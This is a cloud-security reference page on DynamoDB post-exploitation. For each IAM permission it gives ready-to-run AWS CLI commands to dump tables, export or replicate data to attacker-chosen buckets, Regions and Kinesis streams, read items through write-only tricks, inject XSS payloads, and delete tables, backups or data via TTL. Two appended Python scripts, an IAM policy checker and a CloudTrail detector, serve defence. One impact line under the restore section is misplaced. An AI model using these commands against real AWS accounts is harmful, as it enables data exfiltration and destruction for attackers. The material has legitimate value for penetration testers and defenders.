AWS - DynamoDB Post Exploitation
DynamoDB
For more information, check:
dynamodb:BatchGetItem
An attacker with this permission will be able to get items from tables by primary key (you cannot simply request all the data in the table). This means you need to know the primary keys (you can obtain them from the table metadata with describe-table).
aws dynamodb batch-get-item --request-items file:///tmp/a.json
// With a.json
{
"ProductCatalog" : { // This is the table name
"Keys": [
{
"Id" : { // Primary keys name
"N": "205" // Value to search for, you could put here entries from 1 to 1000 to dump all those
}
}
]
}
}
Potential Impact: Indirect privesc by locating sensitive information in the table
dynamodb:GetItem
Similar to the previous permission, this one allows a potential attacker to read values from just 1 table given the primary key of the entry to retrieve:
aws dynamodb get-item --table-name ProductCatalog --key file:///tmp/a.json
// With a.json
{
"Id" : {
"N": "205"
}
}
With this permission it is also possible to use the transact-get-items method, like:
aws dynamodb transact-get-items \
--transact-items file:///tmp/a.json
// With a.json
[
{
"Get": {
"Key": {
"Id": {"N": "205"}
},
"TableName": "ProductCatalog"
}
}
]
Potential Impact: Indirect privesc by locating sensitive information in the table
dynamodb:Query
Similar to the previous permissions, this one allows a potential attacker to read values from just 1 table given the primary key of the entry to retrieve. It allows a subset of comparisons, but the only comparison allowed with the primary key (which must be present) is "EQ", so you cannot use a comparison to get the whole DB in one request.
aws dynamodb query --table-name ProductCatalog --key-conditions file:///tmp/a.json
// With a.json
{
"Id" : {
"ComparisonOperator":"EQ",
"AttributeValueList": [ {"N": "205"} ]
}
}
Potential Impact: Indirect privesc by locating sensitive information in the table
dynamodb:Scan
You can use this permission to dump the entire table easily.
aws dynamodb scan --table-name <t_name> #Get data inside the table
Potential Impact: Indirect privesc by locating sensitive information in the table
dynamodb:PartiQLSelect
You can use this permission to dump the entire table easily.
aws dynamodb execute-statement \
--statement "SELECT * FROM ProductCatalog"
This permission also allows running batch-execute-statement, like:
aws dynamodb batch-execute-statement \
--statements '[{"Statement": "SELECT * FROM ProductCatalog WHERE Id = 204"}]'
but you need to specify the primary key with a value, so it isn't that useful.
Potential Impact: Indirect privesc by locating sensitive information in the table
dynamodb:ExportTableToPointInTime|(dynamodb:UpdateContinuousBackups)
This permission allows an attacker to export the whole table to an S3 bucket of their choice:
aws dynamodb export-table-to-point-in-time \
--table-arn arn:aws:dynamodb:<region>:<account-id>:table/TargetTable \
--s3-bucket <attacker_s3_bucket> \
--s3-prefix <optional_prefix> \
--export-time <point_in_time> \
--region <region>
Note that for this to work the table needs to have point-in-time recovery enabled; you can check whether the table has it with:
aws dynamodb describe-continuous-backups \
--table-name <tablename>
If it isn't enabled, you will need to enable it, and for that you need the dynamodb:ExportTableToPointInTime permission:
aws dynamodb update-continuous-backups \
--table-name <value> \
--point-in-time-recovery-specification PointInTimeRecoveryEnabled=true
Potential Impact: Indirect privesc by locating sensitive information in the table
dynamodb:CreateTable, dynamodb:RestoreTableFromBackup, (dynamodb:CreateBackup)
With these permissions, an attacker could create a new table from a backup (or even create a backup and then restore it to a different table). Then, with the necessary permissions, they could inspect information from the backups that is no longer in the production table.
aws dynamodb restore-table-from-backup \
--backup-arn <source-backup-arn> \
--target-table-name <new-table-name> \
--region <region>
Potential Impact: Indirect privesc by locating sensitive information in the table backup
dynamodb:PutItem
This permission allows users to add a new item to the table or replace an existing item with a new one. If an item with the same primary key already exists, the entire item is replaced by the new item. If the primary key does not exist, a new item with the specified primary key is created.
## Create new item with XSS payload
aws dynamodb put-item --table-name <table_name> --item file://add.json
### With add.json:
{
"Id": {
"S": "1000"
},
"Name": {
"S": "Marc"
},
"Description": {
"S": "<script>alert(1)</script>"
}
}
Potential Impact: Exploitation of further vulnerabilities/bypasses by being able to add/modify data in a DynamoDB table
dynamodb:UpdateItem
This permission allows users to modify the existing attributes of an item or add new attributes to an item. It does not replace the entire item; it only updates the specified attributes. If the primary key does not exist in the table, the operation creates a new item with the specified primary key and sets the attributes specified in the update expression.
## Update item with XSS payload
aws dynamodb update-item --table-name <table_name> \
--key file://key.json --update-expression "SET Description = :value" \
--expression-attribute-values file://val.json
### With key.json:
{
"Id": {
"S": "1000"
}
}
### and val.json
{
":value": {
"S": "<script>alert(1)</script>"
}
}
Potential Impact: Exploitation of further vulnerabilities/bypasses by being able to add/modify data in a DynamoDB table
dynamodb:DeleteTable
An attacker with this permission can delete a DynamoDB table, causing data loss.
aws dynamodb delete-table \
--table-name TargetTable \
--region <region>
Potential impact: Data loss and disruption of services relying on the deleted table.
dynamodb:DeleteBackup
An attacker with this permission can delete a DynamoDB backup, potentially causing data loss in a disaster recovery scenario.
aws dynamodb delete-backup \
--backup-arn arn:aws:dynamodb:<region>:<account-id>:table/TargetTable/backup/BACKUP_ID \
--region <region>
Potential impact: Data loss and inability to recover from a backup during a disaster recovery scenario.
dynamodb:StreamSpecification, dynamodb:UpdateTable, dynamodb:DescribeStream, dynamodb:GetShardIterator, dynamodb:GetRecords
note
TODO: Test whether this actually works
An attacker with these permissions can enable a stream on a DynamoDB table, update the table to begin streaming changes, and then access the stream to monitor changes to the table in real time. This allows the attacker to monitor and exfiltrate data changes, potentially leading to data leakage.
- Enable a stream on a DynamoDB table:
aws dynamodb update-table \
--table-name TargetTable \
--stream-specification StreamEnabled=true,StreamViewType=NEW_AND_OLD_IMAGES \
--region <region>
- Describe the stream to obtain the ARN and other information:
aws dynamodb describe-stream \
--table-name TargetTable \
--region <region>
- Get the shard iterator using the stream ARN:
aws dynamodbstreams get-shard-iterator \
--stream-arn <stream_arn> \
--shard-id <shard_id> \
--shard-iterator-type LATEST \
--region <region>
- Use the shard iterator to access and exfiltrate data from the stream:
aws dynamodbstreams get-records \
--shard-iterator <shard_iterator> \
--region <region>
Potential impact: Real-time monitoring and data leakage of the DynamoDB table's changes.
Read items via dynamodb:UpdateItem and ReturnValues=ALL_OLD
An attacker with only dynamodb:UpdateItem on a table can read items without any of the usual read permissions (GetItem/Query/Scan) by performing a benign update and requesting --return-values ALL_OLD. DynamoDB returns the full pre-update image of the item in the Attributes field of the response (this does not consume RCUs).
- Minimum permissions: dynamodb:UpdateItem on the target table/key.
- Prerequisites: You must know the item's primary key.
Example (adds a harmless attribute and exfiltrates the previous item in the response):
aws dynamodb update-item \
--table-name <TargetTable> \
--key '{"<PKName>":{"S":"<PKValue>"}}' \
--update-expression 'SET #m = :v' \
--expression-attribute-names '{"#m":"exfil_marker"}' \
--expression-attribute-values '{":v":{"S":"1"}}' \
--return-values ALL_OLD \
--region <region>
The CLI response will include an Attributes block containing the complete previous item (all attributes), effectively providing a read primitive from write-only access.
Potential Impact: Read arbitrary items from a table with only write permissions, enabling sensitive data exfiltration when primary keys are known.
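The mitigation side of this read primitive, as an added example (not HackTricks code): a Python check that flags IAM Allow statements granting UpdateItem without pinning the dynamodb:ReturnValues condition key away from ALL_OLD/ALL_NEW. It goes beyond the text by also covering PutItem and DeleteItem, which accept ReturnValues=ALL_OLD as well. The policy, Sids and account ID are constructed; NotAction and explicit Deny statements are not evaluated.

```python
import fnmatch

# Item writes whose ReturnValues parameter can echo the stored item back.
WRITE_ACTIONS = ("dynamodb:UpdateItem", "dynamodb:PutItem", "dynamodb:DeleteItem")
FULL_IMAGE = {"ALL_OLD", "ALL_NEW"}          # settings that return a whole item
PINNING_OPS = {"stringequals", "stringequalsifexists"}

def as_list(value):
    if value is None:
        return []
    return value if isinstance(value, list) else [value]

def granted_writes(stmt):
    """Write actions matched by the statement's Action patterns (IAM wildcards)."""
    patterns = [str(p).lower() for p in as_list(stmt.get("Action"))]
    return [a for a in WRITE_ACTIONS
            if any(fnmatch.fnmatchcase(a.lower(), p) for p in patterns)]

def return_values_pinned(stmt):
    """True when a condition limits dynamodb:ReturnValues to partial/no images."""
    for op, keys in (stmt.get("Condition") or {}).items():
        if op.lower() not in PINNING_OPS:
            continue
        for key, allowed in keys.items():
            values = {str(v).upper() for v in as_list(allowed)}
            if key.lower() == "dynamodb:returnvalues" and not values & FULL_IMAGE:
                return True
    return False

def find_read_primitives(policy):
    """List Allow statements where a write grant doubles as an item read."""
    findings = []
    for i, stmt in enumerate(as_list(policy.get("Statement"))):
        writes = granted_writes(stmt)
        if stmt.get("Effect") == "Allow" and writes and not return_values_pinned(stmt):
            findings.append({"sid": stmt.get("Sid", "statement[%d]" % i),
                             "actions": writes})
    return findings

# Constructed policy for illustration; the table ARNs and Sids are made up.
ARN = "arn:aws:dynamodb:us-east-1:111122223333:table/"
SAMPLE_POLICY = {"Version": "2012-10-17", "Statement": [
    {"Sid": "WriterUnrestricted", "Effect": "Allow",
     "Action": "dynamodb:UpdateItem", "Resource": ARN + "Orders"},
    {"Sid": "WriterPinned", "Effect": "Allow",
     "Action": ["dynamodb:Update*"], "Resource": ARN + "Audit",
     "Condition": {"StringEqualsIfExists": {"dynamodb:ReturnValues":
                   ["NONE", "UPDATED_OLD", "UPDATED_NEW"]}}},
    {"Sid": "ReadOnly", "Effect": "Allow",
     "Action": "dynamodb:GetItem", "Resource": ARN + "Orders"},
    {"Sid": "WildcardWrites", "Effect": "Allow",
     "Action": "dynamodb:*Item", "Resource": "*",
     "Condition": {"StringEquals": {"dynamodb:ReturnValues": ["NONE", "ALL_OLD"]}}},
]}

if __name__ == "__main__":
    for f in find_read_primitives(SAMPLE_POLICY):
        print(f["sid"], "->", ", ".join(f["actions"]))
```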
dynamodb:UpdateTable (replica-updates) | dynamodb:CreateTableReplica
Stealth exfiltration by adding a new replica Region to a DynamoDB Global Table (version 2019.11.21). If a principal can add a regional replica, the whole table is replicated to the attacker-chosen Region, from which the attacker can read all items.
# Add a new replica Region (from primary Region)
aws dynamodb update-table \
--table-name <TableName> \
--replica-updates '[{"Create": {"RegionName": "<replica-region>"}}]' \
--region <primary-region>
# Wait until the replica table becomes ACTIVE in the replica Region
aws dynamodb describe-table --table-name <TableName> --region <replica-region> --query 'Table.TableStatus'
# Exfiltrate by reading from the replica Region
aws dynamodb scan --table-name <TableName> --region <replica-region>
Permissions: dynamodb:UpdateTable (with replica-updates) or dynamodb:CreateTableReplica on the target table. If a CMK is used in the replica, KMS permissions for that key may be required.
Potential Impact: Full-table replication to an attacker-controlled Region, leading to stealthy data exfiltration.
dynamodb:TransactWriteItems (read via failed condition + ReturnValuesOnConditionCheckFailure=ALL_OLD)
An attacker with transactional write privileges can exfiltrate the full attributes of an existing item by performing an Update inside TransactWriteItems that intentionally fails a ConditionExpression while setting ReturnValuesOnConditionCheckFailure=ALL_OLD. On failure, DynamoDB includes the prior attributes in the transaction cancellation reasons, effectively turning write-only access into read access to the targeted keys.
# Create the transaction input (list form for --transact-items)
cat > /tmp/tx_items.json << 'JSON'
[
{
"Update": {
"TableName": "<TableName>",
"Key": {"<PKName>": {"S": "<PKValue>"}},
"UpdateExpression": "SET #m = :v",
"ExpressionAttributeNames": {"#m": "marker"},
"ExpressionAttributeValues": {":v": {"S": "x"}},
"ConditionExpression": "attribute_not_exists(<PKName>)",
"ReturnValuesOnConditionCheckFailure": "ALL_OLD"
}
}
]
JSON
# Execute. Newer AWS CLI versions support returning cancellation reasons
aws dynamodb transact-write-items \
--transact-items file:///tmp/tx_items.json \
--region <region> \
--return-cancellation-reasons
# The command fails with TransactionCanceledException; parse cancellationReasons[0].Item
Permissions: dynamodb:TransactWriteItems on the target table (and the underlying item). No read permissions are required.
Potential Impact: Read arbitrary items (by primary key) from a table using only transactional write privileges, via the returned cancellation reasons.
dynamodb:UpdateTable + dynamodb:UpdateItem + dynamodb:Query on GSI
Bypass read restrictions by creating a Global Secondary Index (GSI) with ProjectionType=ALL on a low-entropy attribute, setting that attribute to a constant value across all items, and then querying the index to retrieve full items. This works even if Query/Scan on the base table is denied, as long as you can query the index ARN.
- Minimum permissions:
  - dynamodb:UpdateTable on the target table (to create the GSI with ProjectionType=ALL).
  - dynamodb:UpdateItem on the target table keys (to set the indexed attribute on each item).
  - dynamodb:Query on the index resource ARN (arn:aws:dynamodb:<region>:<account-id>:table/<TableName>/index/<IndexName>).
Steps (PoC in us-east-1):
# 1) Create table and seed items (without the future GSI attribute)
aws dynamodb create-table --table-name HTXIdx \
--attribute-definitions AttributeName=id,AttributeType=S \
--key-schema AttributeName=id,KeyType=HASH \
--billing-mode PAY_PER_REQUEST --region us-east-1
aws dynamodb wait table-exists --table-name HTXIdx --region us-east-1
for i in 1 2 3 4 5; do \
aws dynamodb put-item --table-name HTXIdx \
--item "{\"id\":{\"S\":\"$i\"},\"secret\":{\"S\":\"sec-$i\"}}" \
--region us-east-1; done
# 2) Add GSI on attribute X with ProjectionType=ALL
aws dynamodb update-table --table-name HTXIdx \
--attribute-definitions AttributeName=X,AttributeType=S \
--global-secondary-index-updates '[{"Create":{"IndexName":"ExfilIndex","KeySchema":[{"AttributeName":"X","KeyType":"HASH"}],"Projection":{"ProjectionType":"ALL"}}}]' \
--region us-east-1
# Wait for index to become ACTIVE
aws dynamodb describe-table --table-name HTXIdx --region us-east-1 \
--query 'Table.GlobalSecondaryIndexes[?IndexName==`ExfilIndex`].IndexStatus'
# 3) Set X="dump" for each item (only UpdateItem on known keys)
for i in 1 2 3 4 5; do \
aws dynamodb update-item --table-name HTXIdx \
--key "{\"id\":{\"S\":\"$i\"}}" \
--update-expression 'SET #x = :v' \
--expression-attribute-names '{"#x":"X"}' \
--expression-attribute-values '{":v":{"S":"dump"}}' \
--region us-east-1; done
# 4) Query the index by the constant value to retrieve full items
aws dynamodb query --table-name HTXIdx --index-name ExfilIndex \
--key-condition-expression '#x = :v' \
--expression-attribute-names '{"#x":"X"}' \
--expression-attribute-values '{":v":{"S":"dump"}}' \
--region us-east-1
Potential Impact: Full table exfiltration by querying a newly created GSI that projects all attributes, even when read permissions on the base table are denied.
dynamodb:EnableKinesisStreamingDestination (Continuous exfiltration via Kinesis Data Streams)
Abusing DynamoDB Kinesis streaming destinations to continuously exfiltrate changes from a table into an attacker-controlled Kinesis Data Stream. Once enabled, every INSERT/MODIFY/REMOVE event is forwarded in near real time to the stream without needing read permissions on the table.
Minimum permissions (attacker):
- dynamodb:EnableKinesisStreamingDestination on the target table
- Optionally dynamodb:DescribeKinesisStreamingDestination/dynamodb:DescribeTable to monitor status
- Read permissions on the attacker-owned Kinesis stream to consume records: kinesis:*
PoC (us-east-1)
# 1) Prepare: create a table and seed one item
aws dynamodb create-table --table-name HTXKStream \
--attribute-definitions AttributeName=id,AttributeType=S \
--key-schema AttributeName=id,KeyType=HASH \
--billing-mode PAY_PER_REQUEST --region us-east-1
aws dynamodb wait table-exists --table-name HTXKStream --region us-east-1
aws dynamodb put-item --table-name HTXKStream \
--item file:///tmp/htx_item1.json --region us-east-1
# /tmp/htx_item1.json
# {"id":{"S":"a1"},"secret":{"S":"s-1"}}
# 2) Create attacker Kinesis Data Stream
aws kinesis create-stream --stream-name htx-ddb-exfil --shard-count 1 --region us-east-1
aws kinesis wait stream-exists --stream-name htx-ddb-exfil --region us-east-1
# 3) Enable the DynamoDB -> Kinesis streaming destination
STREAM_ARN=$(aws kinesis describe-stream-summary --stream-name htx-ddb-exfil \
--region us-east-1 --query StreamDescriptionSummary.StreamARN --output text)
aws dynamodb enable-kinesis-streaming-destination \
--table-name HTXKStream --stream-arn "$STREAM_ARN" --region us-east-1
# Optionally wait until ACTIVE
aws dynamodb describe-kinesis-streaming-destination --table-name HTXKStream \
--region us-east-1 --query 'KinesisDataStreamDestinations[0].DestinationStatus'
# 4) Generate changes on the table
aws dynamodb put-item --table-name HTXKStream \
--item file:///tmp/htx_item2.json --region us-east-1
# /tmp/htx_item2.json
# {"id":{"S":"a2"},"secret":{"S":"s-2"}}
aws dynamodb update-item --table-name HTXKStream \
--key file:///tmp/htx_key_a1.json \
--update-expression "SET #i = :v" \
--expression-attribute-names '{"#i":"info"}' \
--expression-attribute-values '{":v":{"S":"updated"}}' \
--region us-east-1
# /tmp/htx_key_a1.json -> {"id":{"S":"a1"}}
# 5) Consume from Kinesis to observe DynamoDB images
SHARD=$(aws kinesis list-shards --stream-name htx-ddb-exfil --region us-east-1 \
--query 'Shards[0].ShardId' --output text)
IT=$(aws kinesis get-shard-iterator --stream-name htx-ddb-exfil --shard-id "$SHARD" \
--shard-iterator-type TRIM_HORIZON --region us-east-1 --query ShardIterator --output text)
aws kinesis get-records --shard-iterator "$IT" --limit 10 --region us-east-1 > /tmp/krec.json
# Decode one record (Data is base64-encoded)
jq -r '.Records[0].Data' /tmp/krec.json | base64 --decode | jq .
# 6) Cleanup (recommended)
aws dynamodb disable-kinesis-streaming-destination \
--table-name HTXKStream --stream-arn "$STREAM_ARN" --region us-east-1 || true
aws kinesis delete-stream --stream-name htx-ddb-exfil --enforce-consumer-deletion --region us-east-1 || true
aws dynamodb delete-table --table-name HTXKStream --region us-east-1 || true
dynamodb:UpdateTimeToLive
An attacker with the dynamodb:UpdateTimeToLive permission can change a table's TTL (time-to-live) configuration, enabling or disabling TTL. When TTL is enabled, items that carry the configured TTL attribute are deleted automatically once their expiration time is reached. The TTL value is just another attribute on each item; items without that attribute are not affected by TTL-based deletion.
If the items do not already have the TTL attribute, the attacker also needs a permission that allows updating items (for example dynamodb:UpdateItem) to add the TTL attribute and trigger mass deletion.
First enable TTL on the table, specifying the name of the attribute to use for expiration:
aws dynamodb update-time-to-live \
--table-name <TABLE_NAME> \
--time-to-live-specification "Enabled=true, AttributeName=<TTL_ATTRIBUTE_NAME>"
Then update the items to add the TTL attribute (epoch seconds) so that they expire and are removed:
aws dynamodb update-item \
--table-name <TABLE_NAME> \
--key '<PRIMARY_KEY_JSON>' \
--update-expression "SET <TTL_ATTRIBUTE_NAME> = :t" \
--expression-attribute-values '{":t":{"N":"<EPOCH_SECONDS_VALUE>"}}'
dynamodb:RestoreTableFromAwsBackup & dynamodb:RestoreTableToPointInTime
An attacker with the dynamodb:RestoreTableFromAwsBackup or dynamodb:RestoreTableToPointInTime permissions can create new tables restored from backups or from point-in-time recovery (PITR) without overwriting the original table. The restored table contains a full image of the data at the selected point in time, so the attacker can use it to exfiltrate historical information or obtain a complete dump of a past state of the database.
Restore a DynamoDB table from an on-demand backup:
aws dynamodb restore-table-from-backup \
--target-table-name <NEW_TABLE_NAME> \
--backup-arn <BACKUP_ARN>
Restore a DynamoDB table to a point in time (create a new table with the restored state):
aws dynamodb restore-table-to-point-in-time \
--source-table-name <SOURCE_TABLE_NAME> \
--target-table-name <NEW_TABLE_NAME> \
--use-latest-restorable-time
Potential Impact: Continuous, near real-time exfiltration of table changes to an attacker-controlled Kinesis stream without direct read operations on the table.
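Several paths on this page need no read permission on the table but do change its configuration (enabling a stream, adding a replica Region, creating a GSI with ProjectionType=ALL, a Kinesis streaming destination, export to S3, TTL changes, restores), so they can be triaged from CloudTrail records. The following Python is an added example, not HackTricks code; the allowlists and sample records are constructed, and the lowerCamelCase requestParameters field names are an assumption to verify against your own trail.

```python
import json

# Assumed allowlists for the monitored account (constructed values).
APPROVED_REPLICA_REGIONS = {"us-east-1", "eu-west-1"}
APPROVED_EXPORT_BUCKETS = {"corp-ddb-exports"}
APPROVED_KINESIS_STREAMS = {"arn:aws:kinesis:us-east-1:111122223333:stream/ddb-cdc"}

def classify(event):
    """Findings for one CloudTrail record; empty list when nothing matches."""
    if event.get("eventSource") != "dynamodb.amazonaws.com":
        return []
    name, p, out = event.get("eventName"), event.get("requestParameters") or {}, []
    if name == "UpdateTable":
        spec = p.get("streamSpecification") or {}
        if spec.get("streamEnabled"):
            out.append("stream enabled: " + str(spec.get("streamViewType")))
        for upd in p.get("replicaUpdates") or []:
            region = (upd.get("create") or {}).get("regionName")
            if region and region not in APPROVED_REPLICA_REGIONS:
                out.append("replica created in unapproved region: " + region)
        for upd in p.get("globalSecondaryIndexUpdates") or []:
            gsi = upd.get("create") or {}
            if (gsi.get("projection") or {}).get("projectionType") == "ALL":
                out.append("GSI projecting ALL attributes: " + str(gsi.get("indexName")))
    elif name == "EnableKinesisStreamingDestination":
        if p.get("streamArn") not in APPROVED_KINESIS_STREAMS:
            out.append("unapproved Kinesis destination: " + str(p.get("streamArn")))
    elif name == "ExportTableToPointInTime":
        if p.get("s3Bucket") not in APPROVED_EXPORT_BUCKETS:
            out.append("export to unapproved bucket: " + str(p.get("s3Bucket")))
    elif name == "UpdateTimeToLive":
        spec = p.get("timeToLiveSpecification") or {}
        out.append("TTL enabled=%s on attribute %s"
                   % (spec.get("enabled"), spec.get("attributeName")))
    elif name in ("RestoreTableFromBackup", "RestoreTableToPointInTime"):
        out.append("table restored as: " + str(p.get("targetTableName")))
    return out

def scan(records):
    """Return (principal ARN, eventName, finding) for every flagged record."""
    hits = []
    for ev in records:
        who = (ev.get("userIdentity") or {}).get("arn", "unknown")
        hits += [(who, ev.get("eventName"), f) for f in classify(ev)]
    return hits

# Constructed sample records (not real logs); field shapes are assumed.
SAMPLE = json.loads("""[
 {"eventSource":"dynamodb.amazonaws.com","eventName":"UpdateTable","userIdentity":{"arn":"arn:aws:iam::111122223333:user/dev1"},
  "requestParameters":{"tableName":"Orders","replicaUpdates":[{"create":{"regionName":"ap-southeast-2"}}]}},
 {"eventSource":"dynamodb.amazonaws.com","eventName":"UpdateTable","userIdentity":{"arn":"arn:aws:iam::111122223333:role/ops"},
  "requestParameters":{"tableName":"Orders","provisionedThroughput":{"readCapacityUnits":25,"writeCapacityUnits":25}}},
 {"eventSource":"dynamodb.amazonaws.com","eventName":"UpdateTable","userIdentity":{"arn":"arn:aws:iam::111122223333:user/dev1"},
  "requestParameters":{"tableName":"Orders","globalSecondaryIndexUpdates":[{"create":{"indexName":"ExfilIndex","projection":{"projectionType":"ALL"}}}]}},
 {"eventSource":"dynamodb.amazonaws.com","eventName":"EnableKinesisStreamingDestination","userIdentity":{"arn":"arn:aws:iam::111122223333:user/dev1"},
  "requestParameters":{"tableName":"Orders","streamArn":"arn:aws:kinesis:us-east-1:111122223333:stream/htx-ddb-exfil"}},
 {"eventSource":"dynamodb.amazonaws.com","eventName":"ExportTableToPointInTime","userIdentity":{"arn":"arn:aws:iam::111122223333:role/ops"},
  "requestParameters":{"tableArn":"arn:aws:dynamodb:us-east-1:111122223333:table/Orders","s3Bucket":"corp-ddb-exports"}}
]""")

if __name__ == "__main__":
    for who, name, finding in scan(SAMPLE):
        print(who, name, finding)
```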